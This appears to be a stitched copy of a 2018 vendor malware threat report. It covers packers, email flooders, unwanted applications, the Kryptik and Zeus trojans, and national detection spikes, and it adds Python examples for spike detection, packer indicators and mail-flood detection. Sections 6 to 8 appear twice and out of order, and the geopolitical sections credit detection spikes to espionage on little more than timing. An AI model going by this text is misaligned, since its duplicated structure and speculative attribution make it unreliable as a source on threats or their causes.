First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. One caveat when reading these numbers: "Kryptik" is a generic detection name that several vendors apply to heavily obfuscated or packed trojans, so it groups many unrelated payloads under one label, and its prominence across verticals reflects how common obfuscation is as much as it reflects any single family.
Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
Two conclusions follow. First, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create a unique malware profile for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
The timelines in this section pair Comodo detection counts with the news of the day. A coincident spike shows that activity rose on that day; the event is offered as one plausible explanation rather than as attribution, and confirming it would require looking at the samples themselves, their families and where they were seen.
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately set about fulfilling those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place at the same time as the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo's further research on the detected malware identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security affairs, are mostly conducted online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattacks that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Vantaa, in the Helsinki metropolitan area, precisely where the summit was then scheduled to take place.
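A reproducible way to find the spikes that Sections 7.1 through 7.10 reason from, as an added Python example that is not part of the Comodo report: it scores each day of a detection-count series against a median/MAD baseline, reports the days that clear a threshold, and lists calendar events within a day of each. The series, the event calendar and the threshold of 5 are constructed for the example, not Comodo telemetry.

```python
"""Robust spike detection over a daily detection-count series, the kind of analysis
behind the Section 7 timelines.  Added example, not code from the Comodo report; the
series and the event calendar are constructed here, not Comodo data."""
from datetime import date, timedelta
from statistics import median
from typing import Dict, List, Optional, Tuple

Spike = Tuple[date, int, float]


def robust_z_scores(counts: List[int]) -> List[float]:
    """Median/MAD z-scores.  A mean/stddev z-score is pulled upward by the very spikes
    being searched for (one 10x day inflates sigma), so the robust estimator is used;
    1.4826 rescales the MAD to be comparable with sigma for a normal-ish baseline."""
    med = median(counts)
    mad = median(abs(c - med) for c in counts)
    scale = 1.4826 * mad if mad else 1.0
    return [(c - med) / scale for c in counts]


def find_spikes(series: Dict[date, int], threshold: float = 5.0) -> List[Spike]:
    """Days whose robust z-score reaches the threshold, in date order."""
    days = sorted(series)
    scores = robust_z_scores([series[d] for d in days])
    return [(d, series[d], round(z, 1)) for d, z in zip(days, scores) if z >= threshold]


def correlate(spikes: List[Spike], events: Dict[date, str], window_days: int = 1) -> List[dict]:
    """Attach calendar events within +/- window_days of each spike.  A match is a
    hypothesis to test against the samples (families, targets, sources), not attribution;
    with a dense enough calendar every spike will 'match' something."""
    result = []
    for day, count, z in spikes:
        near = [f"{e.isoformat()}: {label}" for e, label in sorted(events.items())
                if abs((e - day).days) <= window_days]
        result.append({"day": day, "count": count, "z": z, "events": near})
    return result


def build_sample_series() -> Dict[date, int]:
    """Constructed Q2 2018 series: a flat baseline of 95-105 detections/day, two real
    spikes and one modest bump that should stay below the threshold."""
    start = date(2018, 4, 1)
    series = {start + timedelta(days=i): 100 + (i * 7) % 11 - 5 for i in range(91)}
    series[date(2018, 5, 2)] = 1400    # ~14x baseline
    series[date(2018, 6, 14)] = 900    # ~9x baseline
    series[date(2018, 5, 20)] = 115    # noise-level bump, not a spike
    return series


SAMPLE_EVENTS = {                       # constructed calendar, not the report's
    date(2018, 5, 1): "national conference opens",
    date(2018, 6, 4): "anniversary with no matching spike",
    date(2018, 6, 14): "new media law passed",
}


def analyze(series: Optional[Dict[date, int]] = None,
            events: Optional[Dict[date, str]] = None) -> List[dict]:
    """Spikes in the series with nearby events attached; defaults to the constructed data."""
    series = build_sample_series() if series is None else series
    events = SAMPLE_EVENTS if events is None else events
    return correlate(find_spikes(series), events)


if __name__ == "__main__":
    for hit in analyze():
        print(f"{hit['day']} count={hit['count']} z={hit['z']} events={hit['events'] or '-'}")
```

On the constructed data the two large days are reported with z-scores in the hundreds, the 115-count bump stays below the threshold, and the June 4 event is not reported at all because no spike falls within a day of it. The correlation step is where the analysis stops being measurement: a matched event is a lead to check against the samples, not a finding.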
8 Conclusions
In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The increase in trojan malware in the last quarter suggests that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 53 of 73
5.3.2 Packers
"Packed" malware is malicious executable code that has been hidden or obfuscated by compressing it into a larger, seemingly innocuous program or data stream; the hostile payload can even be a script. The packed data carries its own decompression stub, or is built as a self-extracting archive, which recreates the original code at run time and then executes it. Encryption is often layered on top of the compression as a further way to conceal the payload from security software.
The detection name MUPX, "modified UPX" (Ultimate Packer for Executables), dominated this part of the malware landscape. UPX itself is free, open-source software that handles numerous file formats on several operating systems, and its UCL decompressor is only a few hundred bytes of code. Modified builds alter the stub, signature and section names so that the stock unpacker (upx -d) no longer recognises the file, but the compressed layout still gives itself away through sections with near-random byte statistics.
In Q2 2018 Russia was the #1 home of malware packers.
This timeline shows that Russia had the most persistent packer problem, while Iran had the highest periodic spikes.
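As an added example, not taken from the report or from Comodo's tooling, the Python below applies two common triage indicators for a packed Windows PE file: section names left behind by UPX-style packers, and sections whose bytes have near-maximal Shannon entropy (the fingerprint of compressed or encrypted data) or that reserve memory while occupying no space on disk. It parses only the PE section table. The two sample files are constructed inline with a minimal MZ/PE skeleton and are not loadable executables; the threshold of 7.0 bits per byte and the section-name list are assumptions a practitioner would tune against their own corpus.

```python
import hashlib
import math
import struct
from collections import Counter

# Section names left behind by stock UPX; modified builds often keep them or use close variants.
KNOWN_PACKER_SECTIONS = {b"UPX0", b"UPX1", b"UPX2"}
# Shannon entropy in bits per byte: compressed or encrypted data sits close to the 8.0 maximum,
# ordinary x86 code and data usually land between roughly 4.5 and 6.5 (assumed threshold).
ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data):
    """Bits of entropy per byte of `data` (0.0 for empty or constant input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe):
    """Walk the PE section table; returns [(name, raw_offset, raw_size, virtual_size)]."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                     # IMAGE_FILE_HEADER follows "PE\0\0"
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)   # SizeOfOptionalHeader
    table = coff + 20 + opt_size                            # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rsize, rptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0"), rptr, rsize, vsize))
    return sections


def packer_indicators(pe):
    """Return human-readable reasons to suspect `pe` is packed (empty list if none)."""
    findings = []
    for name, rptr, rsize, vsize in parse_sections(pe):
        label = name.decode("ascii", errors="replace")
        if name in KNOWN_PACKER_SECTIONS:
            findings.append(f"section {label}: known UPX section name")
        if rsize == 0 and vsize > 0:
            # UPX0 pattern: nothing on disk, but a region reserved for the unpacked image.
            findings.append(f"section {label}: empty on disk but {vsize:#x} bytes in memory")
        elif rsize:
            ent = shannon_entropy(pe[rptr:rptr + rsize])
            if ent >= ENTROPY_THRESHOLD:
                findings.append(f"section {label}: entropy {ent:.2f} bits/byte (compressed or encrypted)")
    return findings


def build_sample_pe(sections):
    """Constructed test input: an MZ/PE skeleton with a section table and no optional header.
    It is enough for the parser above and is NOT a loadable executable."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    cursor = e_lfanew + 4 + len(coff) + 40 * len(sections)  # first byte after the section table
    table, blobs = b"", b""
    for name, body, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, 0x1000,
                             len(body), cursor if body else 0, 0, 0, 0, 0, 0x60000020)
        blobs += body
        cursor += len(body)
    return dos + b"PE\0\0" + coff + table + blobs


# Deterministic stand-in for compressed data: a chain of SHA-256 digests looks uniformly random.
HIGH_ENTROPY_BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
# Stand-in for ordinary code: a NOP sled and a few RETs, i.e. low entropy.
LOW_ENTROPY_BLOB = b"\x90" * 3000 + b"\xC3" * 200

PACKED_SAMPLE = build_sample_pe([(b"UPX0", b"", 0x20000),
                                 (b"UPX1", HIGH_ENTROPY_BLOB, 0x1000),
                                 (b".rsrc", LOW_ENTROPY_BLOB, 0x1000)])
PLAIN_SAMPLE = build_sample_pe([(b".text", LOW_ENTROPY_BLOB, 0x1000)])

if __name__ == "__main__":
    for label, sample in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, packer_indicators(sample) or ["no packer indicators"])
```

Entropy alone also fires on legitimate resources such as embedded PNGs or certificates, so treat these indicators as a reason to send the file to a sandbox or an unpacker rather than as a verdict; a name match plus an empty-on-disk section is the stronger combination.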
5.3.3 Email Flooder
Email flooders are malware that overwhelm a mail server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one email flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this behavior was Germany.
This timeline shows that while the number of Palevo detections was not high, it remained a persistent threat in Germany.
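As an added example, not part of the report, here is the mail-server side of detecting such a flood in Python: it parses the "client=" lines that Postfix's smtpd writes for each accepted message and raises one alert per client IP the first time that IP delivers a threshold number of messages inside a sliding 60-second window. The log excerpt is constructed for illustration; the hostname mx1, the queue IDs and the addresses 192.0.2.10 and 198.51.100.7 are placeholders, and the threshold of 20 messages per minute is an assumption to be set per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Postfix smtpd logs one "client=" line per accepted message, e.g.
#   May 14 10:22:00 mx1 postfix/smtpd[2231]: A1B2C: client=unknown[192.0.2.10]
CLIENT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"(?P<qid>[0-9A-F]+): client=(?P<host>[^\[\s]+)\[(?P<ip>[0-9a-fA-F.:]+)\]"
)


def parse_client_line(line, year=2018):
    """Return (timestamp, client_ip) for a Postfix 'client=' line, or None for any other line.
    Syslog timestamps carry no year, so the caller supplies it."""
    m = CLIENT_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ip"]


def find_flooders(lines, window_seconds=60, threshold=20, year=2018):
    """Sliding-window message counter per client IP.
    Returns {ip: (timestamp, count)} for the moment each IP first reached `threshold`
    messages within any `window_seconds` span."""
    recent = defaultdict(deque)   # ip -> timestamps of messages still inside the window
    alerts = {}
    for line in lines:
        parsed = parse_client_line(line, year)
        if parsed is None:
            continue
        ts, ip = parsed
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:   # expire entries outside the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = (ts, len(q))
    return alerts


def sample_log():
    """Constructed log excerpt (not real data): one legitimate relay sending three messages
    over ten minutes, and one flooder delivering 25 messages in 25 seconds."""
    def client_line(ts, pid, qid, host, ip):
        return f"{ts:%b %d %H:%M:%S} mx1 postfix/smtpd[{pid}]: {qid}: client={host}[{ip}]"

    lines = []
    legit = datetime(2018, 5, 14, 10, 20, 0)
    for i in range(3):
        lines.append(client_line(legit + timedelta(minutes=5 * i), 2210, f"7F{i:03X}",
                                 "mail.example.org", "198.51.100.7"))
    flood = datetime(2018, 5, 14, 10, 22, 0)
    # A connection line without a queue ID; the parser must skip it.
    lines.append(f"{flood:%b %d %H:%M:%S} mx1 postfix/smtpd[2231]: connect from unknown[192.0.2.10]")
    for i in range(25):
        lines.append(client_line(flood + timedelta(seconds=i), 2231, f"A1B{i:03X}",
                                 "unknown", "192.0.2.10"))
    return sorted(lines)   # same day, so lexical order is chronological order


if __name__ == "__main__":
    for ip, (when, count) in find_flooders(sample_log()).items():
        print(f"ALERT {ip}: {count} messages within 60s as of {when:%H:%M:%S}")
```

The preventive counterpart lives in Postfix itself: anvil rate limiting via smtpd_client_message_rate_limit rejects the excess rather than merely logging it, and the detector above then tells you which hosts are hitting that limit.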
5.3.4 Virtual Tools
Virtual tools are programs that modify or alter malicious files so that they evade detection. Because such a tool changes the bytes of a sample without changing its behavior, an exact-hash blocklist misses the result; behavioral and structural detections are the relevant control.
The top virtual tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for virtual tool detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are intended only as humor, or simply to annoy the user for a brief period.
Such software is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense. It is still worth noting, because a joke program proves that an arbitrary executable reached the host and ran there.
Germany (de) and the US were the top two countries of detection for joke malware.
This timeline shows that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover the range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious, or merely suspicious, applications are dangerous because users often download and run them on purpose. Comodo nevertheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), the software is aggressive: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings. The last two matter beyond annoyance, since a changed DNS server or browser setting lets the software redirect traffic for every application on the host.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of applications.
Finally, this timeline shows that, far from being rare, such software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted-application category is alarming because users often install these programs inadvertently in the course of everyday computer and Internet use. Examples include common adware, widely disseminated images and videos, dialers, jokes, gossip apps and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions the user did not intend. This class includes free toolbars, adware and "system optimizers".
As the bubble chart shows, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to provide administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users install inadvertently. They make an ideal carrier for that payload: a crack is fetched from an untrusted source, runs with administrative rights, and routinely comes with instructions to disable anti-virus first.
This malware type is a bit different in that, while the US is the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, from automotive to travel, across four dangerous malware types: backdoors, trojans, viruses and worms. The diagram also lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in one but in multiple verticals, which makes them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to harvest information about an infected host's FTP servers but now also targets email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just before its 2017 gubernatorial election. Note that most anti-virus vendors use Kryptik as a generic label for heavily obfuscated trojans rather than for a single code base, so the behaviors reported under that name belong to many distinct payloads.
Second, "Zbot", another name for the "Zeus" trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and form grabbing, that is, hooking the browser to capture submitted form fields before TLS encrypts them. It has also been used to install ransomware, including CryptoLocker. Zbot is usually spread through drive-by downloads and email phishing, sometimes supported by a social-engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.
In conclusion, trojans are dangerous malware found in every vertical and usable for a wide variety of cyberattacks. Strategic analysis like this can be used to create a unique malware profile for each vertical, providing cyber intelligence that clarifies the primary threats and focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out. What happened in the US on that day that might explain the surge in malware activity? President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, comprising many requests for information on upcoming changes in US political, military and intelligence activity, and immediately set about fulfilling them through computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract professional hackers seeking the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo's further research identified the detected malware as Windows activation ("cracking") software and Chinese-made anti-censorship programs.
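The comparisons in this section rest on how one day's detection count relates to the normal level for that country. As an added example, not from the report, the Python below makes that comparison explicit: it flags any day whose count is at least ten times a robust baseline, where the baseline is the median of all other days (leave-one-out) so that the spike cannot inflate its own reference level, and a floor stops near-zero baselines from flagging trivial counts. The daily series is constructed to mirror the "ten times the usual" pattern described for North Korea; it is not Comodo's data, and the factor of 10 and the floor of 1 are assumptions to tune.

```python
from datetime import date, timedelta
from statistics import median


def spike_days(series, factor=10.0, min_baseline=1.0):
    """Flag days whose count is at least `factor` times the typical day.
    `series` is a list of (iso_date, count). The baseline for each day is the median of all
    OTHER days, so a single huge outlier cannot raise its own baseline; `min_baseline` keeps
    a quiet country (median near 0) from flagging a handful of detections.
    Returns [(iso_date, count, ratio)] in series order."""
    counts = [c for _, c in series]
    flagged = []
    for i, (day, count) in enumerate(series):
        others = counts[:i] + counts[i + 1:]
        baseline = max(median(others), min_baseline) if others else min_baseline
        ratio = count / baseline
        if ratio >= factor:
            flagged.append((day, count, round(ratio, 1)))
    return flagged


def sample_series():
    """Constructed daily detection counts (not Comodo data): 30 days of noise around 50
    with a single spike of 700 on 2018-05-02. The deltas are chosen so the median of the
    29 ordinary days is exactly 50."""
    deltas = [-8, 5, -3, 7, 0, 2, -6, 4, -1, 9, -5, 3, -7, 1, -2,
              6, -4, 8, -9, 5, -3, 2, -6, 4, -1, 3, -8, 7, -2]
    start = date(2018, 4, 20)
    series, d = [], 0
    for i in range(30):
        day = start + timedelta(days=i)
        if day == date(2018, 5, 2):
            series.append((day.isoformat(), 700))
        else:
            series.append((day.isoformat(), 50 + deltas[d]))
            d += 1
    return series


if __name__ == "__main__":
    for day, count, ratio in spike_days(sample_series()):
        print(f"{day}: {count} detections, {ratio}x the median of the other days")
```

A flagged day only says the count is anomalous; tying it to a news event is a separate, manual step, and the same test should be run on the raw sensor population (number of reporting endpoints) to rule out a spike that is really a change in coverage.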
7.5 Armenia
All major geopolitical events today are bathed in malware, because all activities, from social life to business, politics and national security, are now mostly conducted online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest malware detection within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this is provided by this timeline of Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension, and at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have more than one explanation. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack on Estonia in 2007 it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Vantaa, on the outskirts of Helsinki, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
